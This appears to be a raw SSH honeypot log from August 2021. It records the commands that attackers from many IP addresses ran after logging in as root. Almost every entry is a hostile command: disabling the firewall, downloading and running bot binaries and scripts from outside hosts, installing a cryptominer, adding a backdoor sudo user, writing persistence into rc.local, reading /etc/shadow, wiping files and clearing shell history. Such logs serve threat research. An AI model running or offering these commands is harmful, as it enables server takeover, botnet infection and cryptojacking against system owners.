curl -O http://109.104.151.112/multi/bins/bot.i586
chmod 777 bot.i586
chmod +x bot.i586
./bot.i586 Exploit.x86
rm -rf bot.i586
history -c

From 180.215.194.46 1-Aug-2021 21:34:00 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u

From 180.215.194.46 1-Aug-2021 21:42:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u

From 117.24.13.169 2-Aug-2021 05:16:28 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.107.11.18/TT;chmod 777 TT;./TT;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.107.11.18/TT
chmod 777 TT
./TT

From 209.141.61.41 3-Aug-2021 08:25:03 ssh2 root
Exec cat /etc/issue; wget -O- http://45.133.9.175/r.sh | sh; curl http://45.133.9.175/q.sh | sh; useradd -p  fwontop; usermod -aG wheel fwontop; usermod -aG sudo fwontop; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
wget -O- http://45.133.9.175/r.sh | sh
curl http://45.133.9.175/q.sh | sh
useradd -p fwontop
usermod -aG wheel fwontop
usermod -aG sudo fwontop
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 203.146.249.3 3-Aug-2021 13:03:51 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc

From 203.146.249.3 3-Aug-2021 13:49:27 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc

From 107.189.2.152 3-Aug-2021 14:45:56 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a

From 117.24.13.169 6-Aug-2021 18:51:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget http://api.4lheqi.cn/SYNUDP;chmod 777 SYNUDP;./SYNUDP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget http://api.4lheqi.cn/SYNUDP
chmod 777 SYNUDP
./SYNUDP
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget http://api.4lheqi.cn/SYNUDP;chmod 777 SYNUDP;./SYNUDP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget http://api.4lheqi.cn/SYNUDP
chmod 777 SYNUDP
./SYNUDP

From 222.186.133.167 9-Aug-2021 01:24:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/lwbb;chmod 777 lwbb;./lwbb;echo "cd /tmp/">>/etc/rc.local;echo "./lwbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/lwbb
chmod 777 lwbb
./lwbb
echo "cd /tmp/">>/etc/rc.local
echo "./lwbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/lwbb;chmod 777 lwbb;./lwbb;echo "cd /tmp/">>/etc/rc.local;echo "./lwbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/lwbb
chmod 777 lwbb
./lwbb
echo "cd /tmp/">>/etc/rc.local
echo "./lwbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.36.53 9-Aug-2021 05:12:51 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86_64; chmod 777 *; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86_64
chmod 777 *
./x86_64 x86xhed
rm -rf *

From 209.145.54.176 9-Aug-2021 14:00:38 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
unma,e -a
uname -a

From 209.145.54.176 9-Aug-2021 19:35:13 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
w
uname -a
cat /proc/cpuinfo

From 180.215.194.46 9-Aug-2021 22:24:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/s1;chmod 777 s1;./s1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/s1
chmod 777 s1
./s1
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/s1;chmod 777 s1;./s1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/s1
chmod 777 s1
./s1

From 209.141.48.211 10-Aug-2021 02:51:56 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86_64; chmod 777 *; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86_64
chmod 777 *
./x86_64 x86xhed
rm -rf *

From 209.141.53.60 10-Aug-2021 17:13:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 18:50:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 23:38:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 23:49:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 11-Aug-2021 00:48:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 120.194.74.123 11-Aug-2021 04:05:26 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
w

From 120.194.74.123 11-Aug-2021 04:05:30 ssh2 root
lscpu
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 120.194.74.123 11-Aug-2021 04:05:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ip a

From 120.194.74.123 11-Aug-2021 04:05:40 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
wgroute -n

From 120.194.74.123 11-Aug-2021 04:05:45 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
route -n

From 120.194.74.123 11-Aug-2021 04:05:49 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
id richard

From 120.194.74.123 11-Aug-2021 04:05:52 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ls -a

From 120.194.74.123 11-Aug-2021 04:05:54 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cd /home

From 120.194.74.123 11-Aug-2021 04:05:57 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ls -a
ls -a
id

From 120.194.74.123 11-Aug-2021 04:06:04 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cat /etc/shadow

From 120.194.74.123 11-Aug-2021 04:06:13 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cat test.pl

From 120.194.74.123 11-Aug-2021 04:06:25 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
reboot

From 120.194.74.123 11-Aug-2021 04:06:27 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
/sbin/reboot

From 109.104.151.112 11-Aug-2021 07:06:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/multi32/bins/newsetup; curl -O http://109.104.151.112/multi32/bins/newsetup; chmod 777 newsetup; chmod +x newsetup; ./newsetup Exploit.x86; rm -rf newsetup; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/multi32/bins/newsetup
curl -O http://109.104.151.112/multi32/bins/newsetup
chmod 777 newsetup
chmod +x newsetup
./newsetup Exploit.x86
rm -rf newsetup
history -c

From 179.43.141.99 12-Aug-2021 01:37:40 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 222.186.133.167 12-Aug-2021 07:02:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsqq;chmod 777 wsqq;./wsqq;echo "cd /tmp/">>/etc/rc.local;echo "./wsqq&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsqq
chmod 777 wsqq
./wsqq
echo "cd /tmp/">>/etc/rc.local
echo "./wsqq
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsqq;chmod 777 wsqq;./wsqq;echo "cd /tmp/">>/etc/rc.local;echo "./wsqq&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsqq
chmod 777 wsqq
./wsqq
echo "cd /tmp/">>/etc/rc.local
echo "./wsqq
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.215.194.46 12-Aug-2021 13:47:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux-udp26000;chmod 777 Linux-udp26000;./Linux-udp26000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux-udp26000
chmod 777 Linux-udp26000
./Linux-udp26000
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux-udp26000;chmod 777 Linux-udp26000;./Linux-udp26000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux-udp26000
chmod 777 Linux-udp26000
./Linux-udp26000

From 109.104.151.106 12-Aug-2021 20:18:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://betaalverzoek.ir/binInfect.sh; curl -O http://betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://betaalverzoek.ir/binInfect.sh
curl -O http://betaalverzoek.ir/binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp betaalverzoek.ir -c get binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp -r binInfect2.sh -g betaalverzoek.ir
chmod 777 binInfect2.sh
sh binInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh
sh binInfect1.sh
rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh
rm -rf *

From 209.141.36.53 13-Aug-2021 02:11:53 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86; chmod 777 *; ./x86 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86
chmod 777 *
./x86 x86xhed
rm -rf *

From 209.141.36.53 13-Aug-2021 08:08:52 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86; chmod 777 *; ./x86 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86
chmod 777 *
./x86 x86xhed
rm -rf *

From 122.96.31.99 13-Aug-2021 18:04:53 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget  http://navtech.thevsuman.com/ug.txt;perl ug.txt*;wget http://navtech.thevsuman.com/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://navtech.thevsuman.com/ug.txt
perl ug.txt*
wget http://navtech.thevsuman.com/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 222.186.133.167 14-Aug-2021 05:45:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/hhgg;chmod 777 hhgg;./hhgg;echo "cd /tmp/">>/etc/rc.local;echo "./hhgg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/hhgg
chmod 777 hhgg
./hhgg
echo "cd /tmp/">>/etc/rc.local
echo "./hhgg
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/hhgg;chmod 777 hhgg;./hhgg;echo "cd /tmp/">>/etc/rc.local;echo "./hhgg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/hhgg
chmod 777 hhgg
./hhgg
echo "cd /tmp/">>/etc/rc.local
echo "./hhgg
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.167 14-Aug-2021 09:05:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8123/lsyyds;chmod 777 lsyyds;./lsyyds;echo "cd /tmp/">>/etc/rc.local;echo "./lsyyds&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8123/lsyyds
chmod 777 lsyyds
./lsyyds
echo "cd /tmp/">>/etc/rc.local
echo "./lsyyds
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.61.41 16-Aug-2021 16:17:34 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 179.43.141.99 16-Aug-2021 19:08:36 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
